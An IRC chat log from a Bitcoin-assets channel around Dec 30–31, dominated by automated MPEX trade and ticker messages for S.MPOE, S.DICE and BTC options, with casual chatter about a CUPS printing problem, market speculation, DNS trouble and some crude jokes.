Skateboarding Dictionary: Dec 30 18:29:09 son, no bitcoins here Dec 30 18:30:20 i can see an SEC official saying that Dec 30 18:30:30 why is cups so annoying Dec 30 18:30:34 OMG CUPS find my printer Dec 30 18:36:38 [MPEX] [S.MPOE] 14700 @ 0.00064 = 9.408 BTC [+] Dec 30 18:40:52 [MPEX] [S.MPOE] 6100 @ 0.00064 = 3.904 BTC [+] Dec 30 18:43:53 Bugpowder: what if a bunch of vendors just start accepting bitcoin? Wouldn't that as well drive the price up, albeit more slowly than a whale billionaire coming in. Dec 30 18:44:02 [MPEX] [S.MPOE] 1900 @ 0.00064 = 1.216 BTC [+] Dec 30 18:51:33 [MPEX] [S.MPOE] 7650 @ 0.00064 = 4.896 BTC [+] Dec 30 18:55:56 [MPEX] [S.DICE] 1289 @ 0.0036 = 4.6404 BTC [+] Dec 30 18:56:05 The only sustainable rise is from market acceptance Dec 30 18:58:55 there's only room in this town for once currency Dec 30 18:58:59 [MPEX] [S.MPOE] 7412 @ 0.00064 = 4.7437 BTC [+] Dec 30 18:59:02 one* Dec 30 19:05:27 [MPEX] [S.MPOE] 6000 @ 0.00064 = 3.84 BTC [+] Dec 30 19:07:44 ART is a scam Dec 30 19:08:26 [MPEX] [S.MPOE] 8761 @ 0.00064 = 5.607 BTC [+] Dec 30 19:09:18 [MPEX] [S.MPOE] 12950 @ 0.00064 = 8.288 BTC [+] Dec 30 19:10:45 [MPEX] [S.MPOE] 7716 @ 0.00064 = 4.9382 BTC [+] Dec 30 19:13:22 [MPEX] [S.MPOE] 800 @ 0.00064 = 0.512 BTC [+] Dec 30 19:14:57 [MPEX] [S.MPOE] 7129 @ 0.00064 = 4.5626 BTC [+] Dec 30 19:20:34 [MPEX] [S.MPOE] 3200 @ 0.00064 = 2.048 BTC [+] Dec 30 19:20:44 I'm EskimoBob I'm so cool, I'm making ART and selling it for bitcoins Dec 30 19:21:08 I should take bets against BTC companies going bankrupt Dec 30 19:21:09 like yours Dec 30 19:21:11 :D Dec 30 19:22:05 [MPEX] [S.MPOE] 7407 @ 0.00064 = 4.7405 BTC [+] Dec 30 19:25:15 i will loan you ART shares Dec 30 19:25:46 [MPEX] [S.MPOE] 8589 @ 0.00064 = 5.497 BTC [+] Dec 30 19:25:56 I will short them and prove mah point :D Dec 30 19:27:21 [MPEX] [S.MPOE] 8750 @ 0.00064 = 5.6 BTC [+] Dec 30 19:27:53 ok write up a contract Dec 30 19:27:55 mircea_popescu STAT is still fucked up for futures deposits Dec 30 19:27:58 how many shares ya want? Dec 30 19:28:24 pigeons: smickles is my broker we'll have to wait for him Dec 30 19:28:29 pigeons: if you is serious Dec 30 19:28:37 i am Dec 30 19:29:08 EskimoBob: cocoa who said anything about cocoa? Dec 30 19:29:27 sudo apt-get install ghostscript-cups Dec 30 19:29:30 frak Dec 30 19:29:46 dude I hate cups so much Dec 30 19:29:54 this makes me NOT want to use linux anymore Dec 30 19:30:46 cat document | lpr Dec 30 19:32:38 Bugpowder looking Dec 30 19:32:40 yea but it keeps returning Print-Job client-error-document-format-not-supported: Unsupported format Dec 30 19:32:52 set details Dec 30 19:32:56 [MPEX] [S.MPOE] 23500 @ 0.00064 = 15.04 BTC [+] Dec 30 19:33:00 omg Dec 30 19:33:06 i just want to print out sheet music for my lesson Dec 30 19:33:08 WHHHYYY Dec 30 19:37:01 Bugpowder check. Dec 30 19:38:49 [MPEX] [S.MPOE] 9100 @ 0.00064 = 5.824 BTC [+] Dec 30 19:39:22 mircea_popescu: I have an offer you can't refuse Dec 30 19:39:25 aha ? Dec 30 19:39:47 I will send you a brainwashed scarlett johansen for 10mn shares of MPOE Dec 30 19:42:44 https://bitcointalk.org/index.php?topic=119628.msg1426412#new Dec 30 19:47:32 mwahahahaha Dec 30 19:47:59 brainwashed? meh Dec 30 19:48:05 I prefer them feisty Dec 30 19:48:07 mircea+popescu Looks fixed Dec 30 19:48:29 he probably has fiddy bitches dat hotter than dat blonde Dec 30 19:48:34 https://github.com/ircmaxell/PHPPHP Dec 30 19:48:45 end of the world, it was late, but here it is Dec 30 19:52:04 [MPEX] [S.MPOE] 11400 @ 0.00064 = 7.296 BTC [+] Dec 30 19:54:47 [MPEX] [S.MPOE] 12450 @ 0.00064 = 7.968 BTC [+] Dec 30 19:56:34 [MPEX] [S.MPOE] 7908 @ 0.00064 = 5.0611 BTC [+] Dec 30 20:01:32 [MPEX] [S.MPOE] 7500 @ 0.00064 = 4.8 BTC [+] Dec 30 20:03:48 Bugpowder appreciate the headsup. Dec 30 20:06:48 [MPEX] [S.MPOE] 6400 @ 0.00064 = 4.096 BTC [+] Dec 30 20:11:33 ur welcome Dec 30 20:12:04 ur mom Dec 30 20:17:20 urchin Dec 30 20:17:26 [MPEX] [S.MPOE] 13975 @ 0.00064 = 8.944 BTC [+] Dec 30 20:30:29 evoorhees pimpin' S.DICE on the forum Dec 30 20:30:49 https://bitcointalk.org/index.php?topic=101902.msg1426516#msg1426516 Dec 30 20:39:35 [MPEX] [S.MPOE] 9300 @ 0.00064 = 5.952 BTC [+] Dec 30 20:45:45 [MPEX] [S.MPOE] 9100 @ 0.00064 = 5.824 BTC [+] Dec 30 20:52:17 [MPEX] [S.MPOE] 6700 @ 0.00064 = 4.288 BTC [+] Dec 30 21:03:12 [MPEX] [S.MPOE] 10650 @ 0.00064 = 6.816 BTC [+] Dec 30 21:07:22 [MPEX] [S.MPOE] 20500 @ 0.0006392 = 13.1036 BTC [-] Dec 30 21:07:24 [MPEX] [S.MPOE] 14570 @ 0.00063906 = 9.3111 BTC [-] Dec 30 21:07:25 [MPEX] [S.MPOE] 10772 @ 0.00063883 = 6.8815 BTC [-] Dec 30 21:07:26 [MPEX] [S.MPOE] 2900 @ 0.00063849 = 1.8516 BTC [-] Dec 30 21:07:27 [MPEX] [S.MPOE] 10800 @ 0.00063805 = 6.8909 BTC [-] Dec 30 21:07:28 [MPEX] [S.MPOE] 4320 @ 0.00063695 = 2.7516 BTC [-] Dec 30 21:07:29 [MPEX] [S.MPOE] 9450 @ 0.00063488 = 5.9996 BTC [-] Dec 30 21:07:31 [MPEX] [S.MPOE] 6150 @ 0.00063485 = 3.9043 BTC [-] Dec 30 21:07:32 [MPEX] [S.MPOE] 8800 @ 0.00063418 = 5.5808 BTC [-] Dec 30 21:07:33 [MPEX] [S.MPOE] 10358 @ 0.00063406 = 6.5676 BTC [-] Dec 30 21:07:34 [MPEX] [S.MPOE] 10800 @ 0.00063385 = 6.8456 BTC [-] Dec 30 21:07:34 [MPEX] [S.MPOE] 8600 @ 0.0006334 = 5.4472 BTC [-] Dec 30 21:07:35 [MPEX] [S.MPOE] 18300 @ 0.00063306 = 11.585 BTC [-] Dec 30 21:07:36 [MPEX] [S.MPOE] 12516 @ 0.00063273 = 7.9192 BTC [-] Dec 30 21:07:37 [MPEX] [S.MPOE] 7000 @ 0.00063271 = 4.429 BTC [-] Dec 30 21:07:38 [MPEX] [S.MPOE] 7322 @ 0.00063264 = 4.6322 BTC [-] Dec 30 21:07:39 [MPEX] [S.MPOE] 14200 @ 0.00063247 = 8.9811 BTC [-] Dec 30 21:07:40 [MPEX] [S.MPOE] 8400 @ 0.00063231 = 5.3114 BTC [-] Dec 30 21:07:41 [MPEX] [S.MPOE] 9950 @ 0.00063228 = 6.2912 BTC [-] Dec 30 21:07:42 [MPEX] [S.MPOE] 31158 @ 0.00063203 = 19.6928 BTC [-] Dec 30 21:07:43 [MPEX] [S.MPOE] 7576 @ 0.000632 = 4.788 BTC [-] Dec 30 21:07:43 [MPEX] [S.MPOE] 4050 @ 0.00063195 = 2.5594 BTC [-] Dec 30 21:07:44 [MPEX] [S.MPOE] 8850 @ 0.00063193 = 5.5926 BTC [-] Dec 30 21:07:45 [MPEX] [S.MPOE] 21100 @ 0.0006319 = 13.3331 BTC [-] Dec 30 21:07:46 [MPEX] [S.MPOE] 2750 @ 0.00063172 = 1.7372 BTC [-] Dec 30 21:07:47 [MPEX] [S.MPOE] 9740 @ 0.0006317 = 6.1528 BTC [-] Dec 30 21:07:49 [MPEX] [S.MPOE] 8400 @ 0.00063153 = 5.3049 BTC [-] Dec 30 21:07:50 [MPEX] [S.MPOE] 21900 @ 0.0006315 = 13.8299 BTC [-] Dec 30 21:07:51 [MPEX] [S.MPOE] 6050 @ 0.00063147 = 3.8204 BTC [-] Dec 30 21:07:52 [MPEX] [S.MPOE] 4250 @ 0.00063124 = 2.6828 BTC [-] Dec 30 21:07:53 [MPEX] [S.MPOE] 13600 @ 0.00063104 = 8.5821 BTC [-] Dec 30 21:07:53 [MPEX] [S.MPOE] 9850 @ 0.00063102 = 6.2155 BTC [-] Dec 30 21:07:54 [MPEX] [S.MPOE] 6796 @ 0.00063089 = 4.2875 BTC [-] Dec 30 21:07:55 [MPEX] [S.MPOE] 8756 @ 0.00063089 = 5.5241 BTC [-] Dec 30 21:07:56 [MPEX] [S.MPOE] 5400 @ 0.00063084 = 3.4065 BTC [-] Dec 30 21:07:57 [MPEX] [S.MPOE] 9690 @ 0.00063071 = 6.1116 BTC [-] Dec 30 21:07:58 [MPEX] [S.MPOE] 3640 @ 0.00063055 = 2.2952 BTC [-] Dec 30 21:07:59 [MPEX] [S.MPOE] 9934 @ 0.00063048 = 6.2632 BTC [-] Dec 30 21:08:00 [MPEX] [S.MPOE] 4950 @ 0.00063048 = 3.1209 BTC [-] Dec 30 21:08:01 [MPEX] [S.MPOE] 9591 @ 0.00063044 = 6.0466 BTC [-] Dec 30 21:08:02 [MPEX] [S.MPOE] 7800 @ 0.00063034 = 4.9167 BTC [-] Dec 30 21:08:03 [MPEX] [S.MPOE] 7750 @ 0.00063034 = 4.8851 BTC [-] Dec 30 21:08:03 [MPEX] [S.MPOE] 3850 @ 0.00063032 = 2.4267 BTC [-] Dec 30 21:08:04 [MPEX] [S.MPOE] 2950 @ 0.00063023 = 1.8592 BTC [-] Dec 30 21:08:05 [MPEX] [S.MPOE] 2600 @ 0.00063012 = 1.6383 BTC [-] Dec 30 21:08:06 [MPEX] [S.MPOE] 11600 @ 0.00063011 = 7.3093 BTC [-] Dec 30 21:08:07 [MPEX] [S.MPOE] 6279 @ 0.00062996 = 3.9555 BTC [-] Dec 30 21:08:08 [MPEX] [S.MPOE] 8450 @ 0.00062978 = 5.3216 BTC [-] Dec 30 21:08:09 [MPEX] [S.MPOE] 3750 @ 0.00062965 = 2.3612 BTC [-] Dec 30 21:08:09 looks like the bot owner just realized what was happening :) Dec 30 21:08:10 [MPEX] [S.MPOE] 11100 @ 0.00062957 = 6.9882 BTC [-] Dec 30 21:08:11 [MPEX] [S.MPOE] 14100 @ 0.00062953 = 8.8764 BTC [-] Dec 30 21:08:12 [MPEX] [S.MPOE] 7200 @ 0.00062942 = 4.5318 BTC [-] Dec 30 21:08:12 tax purposes Dec 30 21:08:13 [MPEX] [S.MPOE] 12100 @ 0.00062908 = 7.6119 BTC [-] Dec 30 21:08:14 [MPEX] [S.MPOE] 9800 @ 0.00062906 = 6.1648 BTC [-] Dec 30 21:08:15 [MPEX] [S.MPOE] 5450 @ 0.00062904 = 3.4283 BTC [-] Dec 30 21:08:16 [MPEX] [S.MPOE] 7303 @ 0.000629 = 4.5936 BTC [-] Dec 30 21:08:17 [MPEX] [S.MPOE] 4400 @ 0.00062898 = 2.7675 BTC [-] Dec 30 21:08:18 [MPEX] [S.MPOE] 4700 @ 0.00062894 = 2.956 BTC [-] Dec 30 21:08:19 [MPEX] [S.MPOE] 13350 @ 0.00062893 = 8.3962 BTC [-] Dec 30 21:08:20 [MPEX] [S.MPOE] 14234 @ 0.00062892 = 8.952 BTC [-] Dec 30 21:08:21 [MPEX] [S.MPOE] 7800 @ 0.00062887 = 4.9052 BTC [-] Dec 30 21:08:22 [MPEX] [S.MPOE] 7135 @ 0.00062876 = 4.4862 BTC [-] Dec 30 21:08:23 [MPEX] [S.MPOE] 13230 @ 0.00062876 = 8.3185 BTC [-] Dec 30 21:08:24 [MPEX] [S.MPOE] 9050 @ 0.0006287 = 5.6897 BTC [-] Dec 30 21:08:25 [MPEX] [S.MPOE] 10700 @ 0.0006286 = 6.726 BTC [-] Dec 30 21:08:26 [MPEX] [S.MPOE] 3550 @ 0.00062851 = 2.2312 BTC [-] Dec 30 21:08:27 [MPEX] [S.MPOE] 8730 @ 0.00062849 = 5.4867 BTC [-] Dec 30 21:08:28 [MPEX] [S.MPOE] 14872 @ 0.00062845 = 9.3463 BTC [-] Dec 30 21:08:29 [MPEX] [S.MPOE] 9650 @ 0.00062841 = 6.0642 BTC [-] Dec 30 21:08:30 [MPEX] [S.MPOE] 7633 @ 0.00062841 = 4.7967 BTC [-] Dec 30 21:08:31 [MPEX] [S.MPOE] 24805 @ 0.00062841 = 15.5877 BTC [-] Dec 30 21:08:32 [MPEX] [S.MPOE] 10200 @ 0.00062823 = 6.4079 BTC [-] Dec 30 21:08:33 [MPEX] [S.MPOE] 6600 @ 0.00062822 = 4.1463 BTC [-] Dec 30 21:08:34 [MPEX] [S.MPOE] 9200 @ 0.00062816 = 5.7791 BTC [-] Dec 30 21:08:35 [MPEX] [S.MPOE] 13000 @ 0.00062809 = 8.1652 BTC [-] Dec 30 21:08:36 [MPEX] [S.MPOE] 30100 @ 0.00062806 = 18.9046 BTC [-] Dec 30 21:08:37 [MPEX] [S.MPOE] 18592 @ 0.00062796 = 11.675 BTC [-] Dec 30 21:08:38 [MPEX] [S.MPOE] 12250 @ 0.00062788 = 7.6915 BTC [-] Dec 30 21:08:38 shit i have no money in mpex to buy up Dec 30 21:08:39 [MPEX] [S.MPOE] 31700 @ 0.00062781 = 19.9016 BTC [-] Dec 30 21:08:40 [MPEX] [S.MPOE] 26800 @ 0.0006278 = 16.825 BTC [-] Dec 30 21:08:41 [MPEX] [S.MPOE] 9700 @ 0.00062777 = 6.0894 BTC [-] Dec 30 21:08:42 [MPEX] [S.MPOE] 12240 @ 0.00062772 = 7.6833 BTC [-] Dec 30 21:08:43 [MPEX] [S.MPOE] 26650 @ 0.00062771 = 16.7285 BTC [-] Dec 30 21:08:44 [MPEX] [S.MPOE] 2600 @ 0.0006277 = 1.632 BTC [-] Dec 30 21:08:45 [MPEX] [S.MPOE] 10400 @ 0.00062768 = 6.5279 BTC [-] Dec 30 21:08:46 [MPEX] [S.MPOE] 24966 @ 0.00062763 = 15.6694 BTC [-] Dec 30 21:08:47 [MPEX] [S.MPOE] 6400 @ 0.00062751 = 4.0161 BTC [-] Dec 30 21:08:48 [MPEX] [S.MPOE] 1300 @ 0.00062743 = 0.8157 BTC [-] Dec 30 21:08:49 [MPEX] [S.MPOE] 9500 @ 0.00062732 = 5.9595 BTC [-] Dec 30 21:08:50 [MPEX] [S.MPOE] 6350 @ 0.00062729 = 3.9833 BTC [-] Dec 30 21:08:51 [MPEX] [S.MPOE] 13028 @ 0.0006272 = 8.1712 BTC [-] Dec 30 21:08:52 [MPEX] [S.MPOE] 3136 @ 0.00062715 = 1.9667 BTC [-] Dec 30 21:08:53 [MPEX] [S.MPOE] 11200 @ 0.00062712 = 7.0237 BTC [-] Dec 30 21:08:54 [MPEX] [S.MPOE] 4840 @ 0.00062708 = 3.0351 BTC [-] Dec 30 21:08:55 [MPEX] [S.MPOE] 9900 @ 0.00062706 = 6.2079 BTC [-] Dec 30 21:08:56 [MPEX] [S.MPOE] 9904 @ 0.00062705 = 6.2103 BTC [-] Dec 30 21:08:57 [MPEX] [S.MPOE] 16300 @ 0.00062698 = 10.2198 BTC [-] Dec 30 21:08:58 [MPEX] [S.MPOE] 13000 @ 0.00062695 = 8.1504 BTC [-] Dec 30 21:08:59 [MPEX] [S.MPOE] 14500 @ 0.0006269 = 9.0901 BTC [-] Dec 30 21:09:00 [MPEX] [S.MPOE] 34700 @ 0.00062687 = 21.7524 BTC [-] Dec 30 21:09:01 [MPEX] [S.MPOE] 12600 @ 0.00062686 = 7.8984 BTC [-] Dec 30 21:09:02 [MPEX] [S.MPOE] 10150 @ 0.00062672 = 6.3612 BTC [-] Dec 30 21:09:03 [MPEX] [S.MPOE] 43950 @ 0.00062669 = 27.543 BTC [-] Dec 30 21:09:04 [MPEX] [S.MPOE] 8300 @ 0.00062663 = 5.201 BTC [-] Dec 30 21:09:05 [MPEX] [S.MPOE] 6650 @ 0.00062654 = 4.1665 BTC [-] Dec 30 21:09:06 [MPEX] [S.MPOE] 12500 @ 0.00062644 = 7.8305 BTC [-] Dec 30 21:09:07 [MPEX] [S.MPOE] 9688 @ 0.00062641 = 6.0687 BTC [-] Dec 30 21:09:08 [MPEX] [S.MPOE] 29097 @ 0.0006264 = 18.2264 BTC [-] Dec 30 21:09:09 [MPEX] [S.MPOE] 2722 @ 0.00062636 = 1.705 BTC [-] Dec 30 21:09:10 [MPEX] [S.MPOE] 26500 @ 0.0006262 = 16.5943 BTC [-] Dec 30 21:09:11 [MPEX] [S.MPOE] 6278 @ 0.00062619 = 3.9312 BTC [-] Dec 30 21:09:49 ask is still 64000 Dec 30 21:09:55 oh Dec 30 21:10:24 !ticker S.MPOE Dec 30 21:10:25 [MPEX:S.MPOE] 1day: 0.00062616 / 0.00063518 / 0.00064 (3479023 shares, 2,209.83 BTC), 30day: 0.00050368 / 0.00057298 / 0.00064 (74518119 shares, 42,697.42 BTC) Dec 30 21:10:45 jesus two pages of this it moved .x% Dec 30 21:10:49 about 1.5MM Dec 30 21:10:52 shares Dec 30 21:11:03 1.5MM to go Dec 30 21:11:13 2MM Dec 30 21:11:17 enough of that, release the volatility! Dec 30 21:11:20 ha Dec 30 21:14:20 "‘Major setback’ in fiscal cliff talks" Yesss. Dec 30 21:14:51 ES down 26.70 after hours... probably more tomorrow Dec 30 21:15:25 it's never happening, thatdeal. Dec 30 21:19:54 http://polimedia.us/dtng/c/src/135318385329.jpg and here's a girl with a pachiderm Dec 30 21:32:09 ;;ticker Dec 30 21:32:10 BTCUSD ticker | Best bid: 13.45000, Best ask: 13.45006, Bid-ask spread: 0.00006, Last trade: 13.45006, 24 hour volume: 7984.25471044, 24 hour low: 13.35000, 24 hour high: 13.50000, 24 hour vwap: 13.42313 Dec 30 22:30:44 [MPEX] [S.MPOE] 5150 @ 0.00064 = 3.296 BTC [+] Dec 30 22:32:45 [MPEX] [S.MPOE] 7052 @ 0.00064 = 4.5133 BTC [+] Dec 30 22:59:36 [MPEX] [S.MPOE] 2347 @ 0.00064 = 1.5021 BTC [+] Dec 30 23:00:49 [MPEX] [S.MPOE] 4808 @ 0.00064 = 3.0771 BTC [+] Dec 30 23:06:45 [MPEX] [S.MPOE] 3858 @ 0.00064 = 2.4691 BTC [+] Dec 30 23:12:21 [MPEX] [S.MPOE] 6350 @ 0.00064 = 4.064 BTC [+] Dec 30 23:13:53 [MPEX] [S.MPOE] 1800 @ 0.00064 = 1.152 BTC [+] Dec 30 23:36:48 [MPEX] [S.MPOE] 25550 @ 0.00064 = 16.352 BTC [+] Dec 30 23:42:07 [MPEX] [S.MPOE] 11400 @ 0.00064 = 7.296 BTC [+] Dec 30 23:50:06 [MPEX] [S.DICE] 1500 @ 0.00348516 = 5.2277 BTC [-] Dec 30 23:50:08 [MPEX] [S.DICE] 1614 @ 0.0035004 = 5.6496 BTC [+] Dec 30 23:50:09 [MPEX] [S.DICE] 5219 @ 0.0036 = 18.7884 BTC [+] Dec 30 23:52:37 https://bitcointalk.org/index.php?topic=100521.msg1426675#msg1426675 Dec 30 23:57:00 [MPEX] [S.MPOE] 7500 @ 0.00064 = 4.8 BTC [+] Dec 31 00:02:38 [MPEX] [S.MPOE] 13500 @ 0.00064 = 8.64 BTC [+] Dec 31 00:07:06 [MPEX] [S.DICE] 54054 @ 0.0036 = 194.5944 BTC [+] Dec 31 00:10:04 [MPEX] [S.MPOE] 12780 @ 0.00064 = 8.1792 BTC [+] Dec 31 00:14:59 [MPEX] [S.MPOE] 4500 @ 0.00064 = 2.88 BTC [+] Dec 31 00:16:34 !ticker s.dice Dec 31 00:16:36 [MPEX:S.DICE] 1day: 0.00343244 / 0.00357478 / 0.0036 (100846 shares, 360.50 BTC), 30day: 0.0014 / 0.00307919 / 0.0037 (8771555 shares, 27,009.29 BTC) Dec 31 00:19:21 thestringpuller: I noticed a hilight from you? Dec 31 00:50:15 [MPEX] [S.DICE] 1300 @ 0.00347687 = 4.5199 BTC [-] Dec 31 00:51:18 [MPEX] [S.DICE] 700 @ 0.00347687 = 2.4338 BTC [-] Dec 31 00:52:06 [MPEX] [S.MPOE] 4752 @ 0.00064 = 3.0413 BTC [+] Dec 31 00:57:49 [MPEX] [S.MPOE] 9479 @ 0.00064 = 6.0666 BTC [+] Dec 31 01:02:10 [MPEX] [S.MPOE] 756 @ 0.00064 = 0.4838 BTC [+] Dec 31 01:04:56 [MPEX] [S.MPOE] 5380 @ 0.00064 = 3.4432 BTC [+] Dec 31 01:07:48 [MPEX] [S.MPOE] 3950 @ 0.00064 = 2.528 BTC [+] Dec 31 01:10:26 [MPEX] [S.MPOE] 9450 @ 0.00064 = 6.048 BTC [+] Dec 31 01:11:39 [MPEX] [S.MPOE] 4800 @ 0.00064 = 3.072 BTC [+] Dec 31 01:21:58 [MPEX] [S.MPOE] 1950 @ 0.00064 = 1.248 BTC [+] Dec 31 01:27:07 [MPEX] [S.MPOE] 6450 @ 0.00064 = 4.128 BTC [+] Dec 31 01:30:43 [MPEX] [S.MPOE] 15600 @ 0.00064 = 9.984 BTC [+] Dec 31 01:38:00 you know.. i havent see goat on irc lately.. Dec 31 01:38:04 chang... you there? Dec 31 01:38:04 hiding? Dec 31 01:38:20 [MPEX] [S.MPOE] 5060 @ 0.00064 = 3.2384 BTC [+] Dec 31 01:47:08 [MPEX] [S.MPOE] 2000 @ 0.00064 = 1.28 BTC [+] Dec 31 01:50:49 [MPEX] [S.MPOE] 5650 @ 0.00064 = 3.616 BTC [+] Dec 31 01:52:02 [MPEX] [S.MPOE] 7550 @ 0.00064 = 4.832 BTC [+] Dec 31 01:52:18 [MPEX] [S.DICE] 2140 @ 0.0036 = 7.704 BTC [+] Dec 31 01:55:14 [MPEX] [S.MPOE] 10700 @ 0.00064 = 6.848 BTC [+] Dec 31 02:17:53 [MPEX] [S.MPOE] 3550 @ 0.00064 = 2.272 BTC [+] Dec 31 03:05:06 ;;ticker Dec 31 03:05:07 BTCUSD ticker | Best bid: 13.47001, Best ask: 13.49500, Bid-ask spread: 0.02499, Last trade: 13.36634, 24 hour volume: 11919.39373294, 24 hour low: 13.35000, 24 hour high: 13.59000, 24 hour vwap: 13.45637 Dec 31 03:19:34 [MPEX] [S.MPOE] 2165 @ 0.00064 = 1.3856 BTC [+] Dec 31 03:24:22 [MPEX] [S.DICE] 3457 @ 0.0036 = 12.4452 BTC [+] Dec 31 03:24:23 [MPEX] [S.DICE] 1500 @ 0.0036128 = 5.4192 BTC [+] Dec 31 03:24:25 [MPEX] [S.DICE] 2061 @ 0.00364366 = 7.5096 BTC [+] Dec 31 03:24:26 [MPEX] [S.DICE] 600 @ 0.00365195 = 2.1912 BTC [+] Dec 31 03:24:27 [MPEX] [S.DICE] 184750 @ 0.0036675 = 677.5706 BTC [+] Dec 31 03:24:28 [MPEX] [S.DICE] 385000 @ 0.00368 = 1416.8 BTC [+] Dec 31 03:24:29 [MPEX] [S.DICE] 98307 @ 0.00369 = 362.7528 BTC [+] Dec 31 03:25:59 YEAHHHH Dec 31 03:26:23 dats what I'm talkin about Dec 31 03:27:03 only 10,000 BTC to go Dec 31 03:27:19 o hey Dec 31 03:27:21 !ticker s.dicer Dec 31 03:27:22 Invalid ticker. Dec 31 03:27:23 !ticker s.dice Dec 31 03:27:24 [MPEX:S.DICE] 1day: 0.00343244 / 0.00366364 / 0.00369 (777923 shares, 2,850.03 BTC), 30day: 0.0014 / 0.0031218 / 0.0037 (9438672 shares, 29,465.71 BTC) Dec 31 03:32:33 [MPEX] [S.DICE] 349193 @ 0.00369 = 1288.5222 BTC [+] Dec 31 03:32:34 [MPEX] [S.DICE] 191347 @ 0.0036999 = 707.9648 BTC [+] Dec 31 03:36:10 ok, at this rate 10k will be gone by new year's Dec 31 03:37:39 [MPEX] [S.DICE] 68558 @ 0.0036999 = 253.6577 BTC [+] Dec 31 03:41:22 [MPEX] [O.BTCUSD.P190T] 1000 @ 0.41704471 = 417.0447 BTC [+] Dec 31 03:41:27 [MPEX] [O.BTCUSD.P200T] 1000 @ 0.49178391 = 491.7839 BTC [+] Dec 31 03:42:28 !ticker s.dice Dec 31 03:42:30 [MPEX:S.DICE] 1day: 0.00343244 / 0.00367707 / 0.0036999 (1387021 shares, 5,100.18 BTC), 30day: 0.0014 / 0.0031565 / 0.0037 (10047770 shares, 31,715.85 BTC) Dec 31 03:44:07 is blockchain.info down ? Dec 31 03:45:59 flushdns Dec 31 03:47:36 a ok Dec 31 03:47:42 you shold resolve to 91.203.74.204 Dec 31 03:47:43 jesus it's been nasty with dns's the past week Dec 31 03:47:44 not 203 Dec 31 03:59:08 [MPEX] [S.MPOE] 8150 @ 0.00064 = 5.216 BTC [+] Dec 31 04:06:43 [MPEX] [S.MPOE] 7600 @ 0.00064 = 4.864 BTC [+] Dec 31 04:09:15 anyone seen goat? Dec 31 04:14:32 [MPEX] [S.MPOE] 2500 @ 0.00064 = 1.6 BTC [+] Dec 31 04:14:54 Diablo-D3 ? Dec 31 04:19:42 [MPEX] [S.MPOE] 4200 @ 0.00064 = 2.688 BTC [+] Dec 31 04:24:54 [MPEX] [O.BTCUSD.C120T] 3 @ 0.18636531 = 0.5591 BTC [-] Dec 31 04:25:30 [MPEX] [O.BTCUSD.P120T] 1 @ 0.10171553 BTC [-] Dec 31 04:25:49 [MPEX] [O.BTCUSD.C130T] 1 @ 0.1571495 BTC [-] Dec 31 04:26:16 [MPEX] [O.BTCUSD.P130T] 1 @ 0.14 BTC [+] Dec 31 04:26:33 [MPEX] [O.BTCUSD.C140T] 1 @ 0.132 BTC [+] Dec 31 04:26:56 [MPEX] [O.BTCUSD.P140T] 4 @ 0.16782549 = 0.6713 BTC [+] Dec 31 04:27:26 [MPEX] [O.BTCUSD.C150T] 1 @ 0.09210954 BTC [-] Dec 31 04:27:41 [MPEX] [O.BTCUSD.P150T] 2 @ 0.20838298 = 0.4168 BTC [+] Dec 31 04:31:07 [MPEX] [O.BTCUSD.P190T] 1000 @ 0.41704471 = 417.0447 BTC [+] Dec 31 04:31:08 [MPEX] [O.BTCUSD.P200T] 1000 @ 0.49178391 = 491.7839 BTC [+] Dec 31 04:35:14 finally some action this weekend Dec 31 04:35:21 u get some action? :P Dec 31 04:35:26 or week Dec 31 04:35:29 actually Dec 31 04:35:49 yeah I just bot 2 options Dec 31 04:35:56 yesss Dec 31 04:38:46 15 is gonna be the key number I think Dec 31 04:38:53 We'll push past 14 Dec 31 04:39:08 ;;ticker Dec 31 04:39:09 BTCUSD ticker | Best bid: 13.37397, Best ask: 13.46467, Bid-ask spread: 0.09070, Last trade: 13.37394, 24 hour volume: 11910.87556799, 24 hour low: 13.35000, 24 hour high: 13.59000, 24 hour vwap: 13.46368 Dec 31 04:39:27 ;;seen smickles Dec 31 04:39:28 smickles was last seen in #bitcoin-assets 3 hours, 47 minutes, and 8 seconds ago: * smickles fruktose Dec 31 04:41:03 What's the MPSIC for BTC? Dec 31 04:43:40 [MPEX] [O.BTCUSD.P120T] 1 @ 0.15504577 BTC [+] Dec 31 04:44:09 [MPEX] [O.BTCUSD.P130T] 1 @ 0.19999999 BTC [+] Dec 31 04:44:30 thestringpuller: yo Dec 31 04:44:44 [MPEX] [O.BTCUSD.C140T] 1 @ 0.19999999 BTC [+] Dec 31 04:44:46 Namjies: there is not mpsic for btc Dec 31 04:45:26 [MPEX] [O.BTCUSD.C150T] 1 @ 0.17406879 BTC [+] Dec 31 04:45:32 Namjies: however, stat reports btc as CxBTC Dec 31 04:52:56 [MPEX] [O.BTCUSD.P120T] 1 @ 0.15500665 BTC [-] Dec 31 04:53:59 [MPEX] [O.BTCUSD.P130T] 1 @ 0.19999999 BTC [+] Dec 31 04:54:28 [MPEX] [O.BTCUSD.C140T] 1 @ 0.19999999 BTC [+] Dec 31 04:55:01 [MPEX] [O.BTCUSD.C150T] 1 @ 0.17402496 BTC [-] Dec 31 04:57:53 [MPEX] [S.MPOE] 4300 @ 0.00064 = 2.752 BTC [+] Dec 31 04:58:31 [MPEX] [O.BTCUSD.P120T] 1 @ 0.15500665 BTC [-] Dec 31 04:59:20 [MPEX] [O.BTCUSD.P130T] 1 @ 0.19999999 BTC [+] Dec 31 04:59:56 ;;TICKER Dec 31 04:59:57 BTCUSD ticker | Best bid: 13.45001, Best ask: 13.49880, Bid-ask spread: 0.04879, Last trade: 13.45001, 24 hour volume: 12002.95742282, 24 hour low: 13.35000, 24 hour high: 13.59000, 24 hour vwap: 13.46419 Dec 31 05:00:01 [MPEX] [O.BTCUSD.C140T] 1 @ 0.19999999 BTC [+] Dec 31 05:00:49 [MPEX] [O.BTCUSD.C150T] 1 @ 0.17398581 BTC [-] Dec 31 05:01:14 Is there a web feed of 24 hour vwap that I can scrape from somewhere? Dec 31 05:01:58 I am scraping mtgox last price off bitcoincharts which gives volativilty in my spreadsheet Dec 31 05:02:25 Bugpowder: https://mtgox.com/api/1/BTCUSD/ticker ? Dec 31 05:02:30 it has vwap in it Dec 31 05:02:52 but bitcoincharts 24h vwap is different Dec 31 05:03:12 it seems the bitcoincharts # is based on all exchanges Dec 31 05:03:20 yeah I don't care about thiers Dec 31 05:03:30 mtgox is what I want Dec 31 05:03:35 cause its a bigger number Dec 31 05:03:40 makes me feel more rich Dec 31 05:03:51 heh Dec 31 05:04:02 ;;bc,24hprc Dec 31 05:04:04 Error: I tried to send you an empty message. Dec 31 05:04:15 ;;bc,24hprc Dec 31 05:04:16 Error: 